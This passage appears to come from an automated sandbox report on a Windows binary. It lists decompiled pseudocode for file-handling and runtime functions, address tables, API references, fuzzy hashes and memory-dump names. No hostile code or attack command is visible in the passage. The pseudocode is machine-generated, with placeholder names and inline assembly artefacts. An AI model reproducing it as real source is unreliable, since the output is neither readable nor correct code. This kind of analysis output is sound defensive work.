				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0020E920(_t87, _t89 + 0x2208, 0, 0x40);
				E0020E920(_t87, _t89 + 0x2248, 0, 0x34);
				E0020E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}















          0x001f1382
          0x001f1382
          0x001f1382
          0x001f1382
          0x001f1382
          0x001f1387
          0x001f138a
          0x001f138c
          0x001f138f
          0x001f1396
          0x001f13a2
          0x001f13a5
          0x001f13b0
          0x001f13b4
          0x001f13bf
          0x001f13c5
          0x001f13cb
          0x001f13d6
          0x001f13de
          0x001f13e2
          0x001f13e5
          0x001f13eb
          0x001f13f1
          0x001f13f3
          0x001f1418
          0x001f13f5
          0x001f13fa
          0x001f1400
          0x001f1403
          0x001f1409
          0x001f1414
          0x001f140b
          0x001f140d
          0x001f140d
          0x001f1409
          0x001f141b
          0x001f1427
          0x001f142e
          0x001f1435
          0x001f143e
          0x001f1449
          0x001f1453
          0x001f1459
          0x001f145f
          0x001f1465
          0x001f146b
          0x001f1471
          0x001f1477
          0x001f147e
          0x001f1484
          0x001f148a
          0x001f1490
          0x001f1496
          0x001f149c
          0x001f14ab
          0x001f14ba
          0x001f14c5
          0x001f14cd
          0x001f14d3
          0x001f14d9
          0x001f14df
          0x001f14e5
          0x001f14eb
          0x001f14f1
          0x001f14fa
          0x001f1500
          0x001f1506
          0x001f150e
          0x001f1518

          APIs
          • __EH_prolog.LIBCMT ref: 001F1382
            • Part of subcall function 001F5E99: __EH_prolog.LIBCMT ref: 001F5E9E
            • Part of subcall function 001FC4CA: __EH_prolog.LIBCMT ref: 001FC4CF
            • Part of subcall function 001FC4CA: new.LIBCMT ref: 001FC512
            • Part of subcall function 001FC4CA: new.LIBCMT ref: 001FC536
          • new.LIBCMT ref: 001F13FA
            • Part of subcall function 001FAD1B: __EH_prolog.LIBCMT ref: 001FAD20
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: c77d2f108f38a8a0aea241fba49e9b3b2d9bae991d79ae158508f22cc60e9da5
          • Instruction ID: fe59a6184af89df16e725dd76417d0a9dde01c5c1393865168eba2787c748ed1
          • Opcode Fuzzy Hash: c77d2f108f38a8a0aea241fba49e9b3b2d9bae991d79ae158508f22cc60e9da5
          • Instruction Fuzzy Hash: 434106B0905B44DED725DF798485AE6FBE5FF28300F504A2ED6EE83282CB326554CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F137D, Relevance: 3.1, APIs: 2, Instructions: 94COMMON
          Download Yara Rule
          C-Code - Quality: 98%
          			E001F137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0020D870(E00221157, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E001F943C(_t78);
				 *_t89 = 0x2222e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E001F5E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E001FC4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E001F151B();
				_t62 = E001F151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0020D82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E001FAD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0020E920(_t87, _t89 + 0x2208, 0, 0x40);
				E0020E920(_t87, _t89 + 0x2248, 0, 0x34);
				E0020E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}














          0x001f137d
          0x001f137d
          0x001f137d
          0x001f137d
          0x001f1382
          0x001f1387
          0x001f138a
          0x001f138c
          0x001f138f
          0x001f1396
          0x001f13a2
          0x001f13a5
          0x001f13b0
          0x001f13b4
          0x001f13bf
          0x001f13c5
          0x001f13cb
          0x001f13d6
          0x001f13de
          0x001f13e2
          0x001f13e5
          0x001f13eb
          0x001f13f1
          0x001f13f3
          0x001f1418
          0x001f13f5
          0x001f13fa
          0x001f1400
          0x001f1403
          0x001f1409
          0x001f1414
          0x001f140b
          0x001f140d
          0x001f140d
          0x001f1409
          0x001f141b
          0x001f1427
          0x001f142e
          0x001f1435
          0x001f143e
          0x001f1449
          0x001f1453
          0x001f1459
          0x001f145f
          0x001f1465
          0x001f146b
          0x001f1471
          0x001f1477
          0x001f147e
          0x001f1484
          0x001f148a
          0x001f1490
          0x001f1496
          0x001f149c
          0x001f14ab
          0x001f14ba
          0x001f14c5
          0x001f14cd
          0x001f14d3
          0x001f14d9
          0x001f14df
          0x001f14e5
          0x001f14eb
          0x001f14f1
          0x001f14fa
          0x001f1500
          0x001f1506
          0x001f150e
          0x001f1518

          APIs
          • __EH_prolog.LIBCMT ref: 001F1382
            • Part of subcall function 001F5E99: __EH_prolog.LIBCMT ref: 001F5E9E
            • Part of subcall function 001FC4CA: __EH_prolog.LIBCMT ref: 001FC4CF
            • Part of subcall function 001FC4CA: new.LIBCMT ref: 001FC512
            • Part of subcall function 001FC4CA: new.LIBCMT ref: 001FC536
          • new.LIBCMT ref: 001F13FA
            • Part of subcall function 001FAD1B: __EH_prolog.LIBCMT ref: 001FAD20
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: 869ce7f7936ddab774e4ceb6494bed9b4db6292f84433df68fd85c409c0f3ae8
          • Instruction ID: 92734cc2eff130f1c2bd71198de67e0aedef6266c93980a378c3a0b0b71701e7
          • Opcode Fuzzy Hash: 869ce7f7936ddab774e4ceb6494bed9b4db6292f84433df68fd85c409c0f3ae8
          • Instruction Fuzzy Hash: DB4128B0905B44DED725DF798485AE6FBE5FF29300F504A2ED6EE83282CB326564CB11
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021A6B2, Relevance: 3.1, APIs: 2, Instructions: 91COMMON
          Download Yara Rule
          C-Code - Quality: 95%
          			E0021A6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00218516(__ebx, __ecx, __edx);
				E0021A7D1(__ebx, __ecx, __edx, _t81);
				_t31 = E0021A446(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00217A8A(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E0021A873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00217847();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x22db20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x22db20) {
								E00217A50( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x22dda0 & 0x00000001;
							if(( *0x22dda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E0021A31C(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x22dd40; // 0xdb22b0
									 *0x22d814 = _t44;
								}
							}
						}
						L6:
						E00217A50(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00217ECC())) = 0x16;
						goto L5;
					}
				}
			}


















          0x0021a6b2
          0x0021a6bf
          0x0021a6c2
          0x0021a6ca
          0x0021a6d3
          0x0021a6d6
          0x0021a6dc
          0x00000000
          0x0021a6de
          0x0021a6e2
          0x0021a6ef
          0x0021a6f1
          0x0021a6f5
          0x0021a6f7
          0x0021a727
          0x0021a727
          0x00000000
          0x0021a6f9
          0x0021a706
          0x0021a70c
          0x0021a70f
          0x0021a714
          0x0021a718
          0x0021a71a
          0x0021a739
          0x0021a73d
          0x0021a73f
          0x0021a73f
          0x0021a74a
          0x0021a74e
          0x0021a74f
          0x0021a751
          0x0021a754
          0x0021a75b
          0x0021a760
          0x0021a765
          0x0021a75b
          0x0021a766
          0x0021a76c
          0x0021a771
          0x0021a773
          0x0021a776
          0x0021a779
          0x0021a780
          0x0021a782
          0x0021a789
          0x0021a78e
          0x0021a797
          0x0021a79c
          0x0021a7a2
          0x0021a7a4
          0x0021a7a9
          0x0021a7a9
          0x0021a7a2
          0x0021a789
          0x0021a729
          0x0021a72a
          0x00000000
          0x0021a71c
          0x0021a721
          0x00000000
          0x0021a721
          0x0021a71a

          APIs
            • Part of subcall function 00218516: GetLastError.KERNEL32(?,002300E0,00213394,002300E0,?,?,00212E0F,?,?,002300E0), ref: 0021851A
            • Part of subcall function 00218516: _free.LIBCMT ref: 0021854D
            • Part of subcall function 00218516: SetLastError.KERNEL32(00000000,?,002300E0), ref: 0021858E
            • Part of subcall function 00218516: _abort.LIBCMT ref: 00218594
            • Part of subcall function 0021A7D1: _abort.LIBCMT ref: 0021A803
            • Part of subcall function 0021A7D1: _free.LIBCMT ref: 0021A837
            • Part of subcall function 0021A446: GetOEMCP.KERNEL32(00000000,?,?,0021A6CF,?), ref: 0021A471
          • _free.LIBCMT ref: 0021A72A
          • _free.LIBCMT ref: 0021A760
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free$ErrorLast_abort
          • String ID:
          • API String ID: 2991157371-0
          • Opcode ID: 183465bda4bba6af15e681abda7e1ccff5850827c86e5593b57bb07abd2b752c
          • Instruction ID: bf454d90d037119a569705ae8492990f728d16837a733b718727663b537de00e
          • Opcode Fuzzy Hash: 183465bda4bba6af15e681abda7e1ccff5850827c86e5593b57bb07abd2b752c
          • Instruction Fuzzy Hash: BA31D431915205AFDB10EFA8D845BEDB7F4EF60360F25409AE4049B2E1EB719EA2CF51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9528, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E001F9528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E0020D940();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E001FB927(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E001FB32C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E001FFAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}












          0x001f952d
          0x001f9533
          0x001f9540
          0x001f9542
          0x001f9548
          0x001f9556
          0x001f9556
          0x001f9550
          0x001f9550
          0x001f9550
          0x001f9560
          0x001f9575
          0x001f957e
          0x001f9584
          0x001f958e
          0x00000000
          0x001f9590
          0x001f9590
          0x001f9594
          0x001f9596
          0x001f9596
          0x001f959c
          0x001f959c
          0x001f959c
          0x001f95a0
          0x001f95a0
          0x001f95b0
          0x001f95b6
          0x001f95b6
          0x001f95bd
          0x001f95eb
          0x001f95eb
          0x001f95fd
          0x001f9602
          0x001f9605
          0x001f961e

          APIs
          • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,001F9BF3,?,?,001F76AC), ref: 001F95B0
          • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,001F9BF3,?,?,001F76AC), ref: 001F95E5
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CreateFile
          • String ID:
          • API String ID: 823142352-0
          • Opcode ID: 64e0105e07cae693f7a2ffbb56a7c251e784baca073da2e786572d57f6bf8cc1
          • Instruction ID: 26a5153863e95c9163aad369328abe1316a1579e9bf308dfa28db472a9356c46
          • Opcode Fuzzy Hash: 64e0105e07cae693f7a2ffbb56a7c251e784baca073da2e786572d57f6bf8cc1
          • Instruction Fuzzy Hash: 5321E1B100474CAFE7319F54C885BB777E8EB49368F004A2EF6D5821E2C3B5AD498A61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9A7E, Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
          Download Yara Rule
          C-Code - Quality: 84%
          			E001F9A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_a4 = 0;
				} else {
					_a4 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E0020082F(_t51, _t57,  &_v24);
				}
				if(_a4 != 0) {
					E0020082F(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E0020082F(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}















          0x001f9a7e
          0x001f9a84
          0x001f9a8d
          0x001f9a98
          0x001f9a98
          0x001f9a9e
          0x001f9aa4
          0x001f9aa7
          0x001f9ab4
          0x001f9ab0
          0x001f9ab0
          0x001f9ab0
          0x001f9ab6
          0x001f9ab7
          0x001f9abb
          0x001f9ac1
          0x001f9ace
          0x001f9ace
          0x001f9ac3
          0x001f9ac8
          0x001f9acc
          0x00000000
          0x00000000
          0x001f9acc
          0x001f9ad3
          0x001f9ad9
          0x001f9ae3
          0x001f9ae3
          0x001f9ae7
          0x001f9aee
          0x001f9aee
          0x001f9af8
          0x001f9b01
          0x001f9b01
          0x001f9b09
          0x001f9b12
          0x001f9b12
          0x001f9b22
          0x001f9b30
          0x001f9b40
          0x001f9b48
          0x001f9b54

          APIs
          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,001F738C,?,?,?), ref: 001F9A98
          • SetFileTime.KERNELBASE(?,?,?,?), ref: 001F9B48
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: File$BuffersFlushTime
          • String ID:
          • API String ID: 1392018926-0
          • Opcode ID: 0bfa9e279f7b8c60f296ce34a4dbebb387f132aa00b81cfe7361e17033854f63
          • Instruction ID: 62c236f3f180aa4faf583187f2cb1b4e139bf7a62072f12279a11fe27d135052
          • Opcode Fuzzy Hash: 0bfa9e279f7b8c60f296ce34a4dbebb387f132aa00b81cfe7361e17033854f63
          • Instruction Fuzzy Hash: 8821D331258389AFC711EE24D891BBBBBE4BF95304F08092DB981C7192D725ED08CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00219990, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON
          Download Yara Rule
          C-Code - Quality: 90%
          			E00219990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x2507b8 + _a4 * 4;
				_t27 =  *0x22d668; // 0x4319796a
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x22d668; // 0x4319796a
							goto L13;
						}
						 *_t20 = E0020DB10(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00219A2C( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x22d668; // 0x4319796a
						goto L7;
					}
					_t27 =  *0x22d668; // 0x4319796a
					goto L8;
				}
				L2:
				return _t33;
			}










          0x0021999b
          0x002199a4
          0x002199aa
          0x002199b4
          0x002199b6
          0x002199ba
          0x00219a25
          0x00000000
          0x00219a25
          0x002199be
          0x002199c4
          0x002199ca
          0x002199e6
          0x002199e6
          0x002199e8
          0x002199ea
          0x00219a15
          0x00219a17
          0x00219a1f
          0x00219a23
          0x00000000
          0x00219a23
          0x002199f6
          0x002199fa
          0x00219a0f
          0x00000000
          0x00219a0f
          0x00219a03
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x002199cc
          0x002199cc
          0x002199ce
          0x002199d6
          0x00000000
          0x00000000
          0x002199d8
          0x002199de
          0x00000000
          0x00000000
          0x002199e0
          0x00000000
          0x002199e0
          0x00219a07
          0x00000000
          0x00219a07
          0x002199c0
          0x00000000

          APIs
          • GetProcAddress.KERNEL32(00000000,?), ref: 002199F0
          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002199FD
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressProc__crt_fast_encode_pointer
          • String ID:
          • API String ID: 2279764990-0
          • Opcode ID: 91f4c9a94a30633182f7c161c5bb1cf9c3e71f6cf69fc8e31586a1a935aac84e
          • Instruction ID: ed3016065c572d947219523efd3cb00ebf34b732e7f117e91963d1d0ea976f09
          • Opcode Fuzzy Hash: 91f4c9a94a30633182f7c161c5bb1cf9c3e71f6cf69fc8e31586a1a935aac84e
          • Instruction Fuzzy Hash: 57110A37A212229B9F31DE68FC648EA73D99F943207164120FC14AB284D630ECE5CAD0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9B57, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
          Download Yara Rule
          C-Code - Quality: 89%
          			E001F9B57() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E001F6DE2(0x2300e0, 0x2300e0, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E001F6DE2(0x2300e0, 0x2300e0, _t34 + 0x1e);
				goto L3;
			}













          0x001f9b5b
          0x001f9b5d
          0x001f9b68
          0x001f9b7b
          0x001f9b7b
          0x001f9b8d
          0x001f9b93
          0x001f9b97
          0x001f9bb4
          0x001f9bba
          0x001f9bbf
          0x001f9bc1
          0x00000000
          0x001f9ba3
          0x001f9ba7
          0x001f9bd0
          0x001f9bc4
          0x00000000
          0x001f9bc4
          0x001f9baf
          0x00000000
          0x001f9baf
          0x001f9b97
          0x001f9b6e
          0x00000000
          0x001f9bcc
          0x001f9b76
          0x00000000

          APIs
          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 001F9B8D
          • GetLastError.KERNEL32 ref: 001F9B99
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
